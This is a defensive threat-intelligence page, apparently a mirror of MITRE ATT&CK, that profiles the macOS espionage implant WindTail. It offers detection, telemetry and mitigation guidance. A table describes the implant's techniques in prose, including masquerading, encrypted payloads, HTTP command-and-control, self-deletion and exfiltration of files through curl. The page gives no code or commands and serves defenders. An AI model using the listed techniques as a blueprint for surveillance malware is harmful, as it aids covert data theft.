S0466: WindTail
Analyst context for executives and security teams
WindTail is a macOS surveillance implant associated in ATT&CK with Windshift. Its practical significance is that it combines stealth, discovery, collection, archiving, command execution, web-based communications, and exfiltration-related behaviors on macOS systems. For leaders, this is a reminder that Mac fleets need the same visibility, response planning, and data-loss monitoring as Windows and Linux environments.
Executive priority
Prioritize validation of macOS security coverage where sensitive users, executives, developers, or regulated data are present. The ATT&CK relationships point to behaviors that can affect confidentiality and incident scope decisions: automated collection, archiving, outbound transfer, masquerading, invalid code signatures, and cleanup through file deletion. Executives should ask whether SOC and IR teams can prove visibility into Mac endpoint activity, code-signing anomalies, archive creation, and outbound web or unencrypted protocol traffic.
Technical view
ATT&CK does not provide a detection section for WindTail, so coverage should be validated behaviorally. For macOS, defenders should test visibility across related techniques: Unix shell execution, Native API use, file and directory discovery, system time discovery, automated collection, archive creation via utility, encoded or compressed files, deobfuscation, masquerading including invalid code signatures, hidden windows, file deletion, web protocol command-and-control, and exfiltration over unencrypted non-C2 protocols. Detection engineering should correlate host behaviors with network egress rather than relying on a single malware indicator.
Likely telemetry
- macOS endpoint process execution and parent-child process relationships
- Shell command and script execution evidence
- File system activity including discovery, archive creation, encoded or compressed files, and deletion
- Code-signing validation status and application metadata for macOS binaries
- Endpoint security or EDR events for native API-driven behavior where available
Detection direction
- Baseline legitimate macOS administration, backup, compression, and developer workflows before alerting on archive utilities or shell activity.
- Prioritize suspicious combinations: invalid or misleading application identity, shell execution, file discovery, archive creation, and outbound web or unencrypted transfer.
- Review macOS binaries that appear legitimate but fail signature validation or have metadata inconsistent with their location or behavior.
- Correlate encoded or compressed artifacts with later deobfuscation, collection, deletion, or network transfer events.
- Tune for false positives from IT management tools, software installers, backup agents, and developer scripts, but require those tools to be known, signed, and expected in the environment.
Mitigation priorities
- Ensure macOS endpoints are included in managed detection, incident response playbooks, and evidence-retention requirements.
- Enforce application control and code-signing validation policies appropriate to the organization’s risk tolerance.
- Limit unnecessary outbound protocols and route web traffic through monitored controls where feasible.
- Apply least-privilege practices to reduce the data accessible to a compromised user context.
- Maintain endpoint logging for process, file, signature, and network activity long enough to support investigation of collection and exfiltration scenarios.
Analyst notes and limits
The strongest decision value comes from the relationships: WindTail is tied to macOS behaviors spanning stealth, execution, discovery, collection, command-and-control, and exfiltration. Because no official ATT&CK detection text is provided, this take emphasizes coverage validation and correlation of related behaviors rather than malware-specific signatures.
This assessment is limited to the supplied ATT&CK object, external references, and relationship context. ATT&CK lists the platform as macOS and does not specify tactics directly on the malware object or provide official detection guidance. Local asset inventory, logging configuration, and business data locations are required to determine actual exposure and coverage.
WindTail
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1036.001 | Invalid Code Signature Sub-technique | WindTail has been incompletely signed with revoked certificates.Citationobjective-see windtail1 dec 2018 |
| Enterprise | T1106 | Native API | WindTail can invoke Apple APIs |
| Enterprise | T1083 | File and Directory Discovery | WindTail has the ability to enumerate the users home directory and the path to its own application bundle.Citationobjective-see windtail1 dec 2018Citationobjective-see windtail2 jan 2019 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | WindTail can be delivered as a compressed, encrypted, and encoded payload.Citationobjective-see windtail2 jan 2019 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | WindTail has the ability to use HTTP for C2 communications.Citationobjective-see windtail2 jan 2019 |
| Enterprise | T1027.015 | Compression Sub-technique | WindTail can be delivered as a compressed, encrypted, and encoded payload.Citationobjective-see windtail2 jan 2019 |
| Enterprise | T1059.004 | Unix Shell Sub-technique | WindTail can use the |
| Enterprise | T1119 | Automated Collection | WindTail can identify and add files that possess specific file extensions to an array for archiving.Citationobjective-see windtail2 jan 2019 |
| Enterprise | T1036 | Masquerading | WindTail has used icons mimicking MS Office files to mask payloads.Citationobjective-see windtail1 dec 2018 |
| Enterprise | T1560.001 | Archive via Utility Sub-technique | WindTail has the ability to use the macOS built-in zip utility to archive files.Citationobjective-see windtail2 jan 2019 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | WindTail has the ability to decrypt strings using hard-coded AES keys.Citationobjective-see windtail1 dec 2018 |
| Enterprise | T1070.004 | File Deletion Sub-technique | WindTail has the ability to receive and execute a self-delete command.Citationobjective-see windtail2 jan 2019 |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol Sub-technique | WindTail has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.Citationobjective-see windtail2 jan 2019 |
| Enterprise | T1564.003 | Hidden Window Sub-technique | WindTail can instruct the OS to execute an application without a dock icon or menu.Citationobjective-see windtail1 dec 2018 |
| Enterprise | T1124 | System Time Discovery | WindTail has the ability to generate the current date and time.Citationobjective-see windtail1 dec 2018 |
Groups, software, and campaigns
G0112: Windshift
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | 5a55594600bd… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
SANS Windshift August 2018
Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved November 17, 2024.
Open source URL -
[2]
objective-see windtail1 dec 2018
Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019.
Open source URL -
[3]
objective-see windtail2 jan 2019
Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019.
Open source URL -
[4]
mitre-attack S0466Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.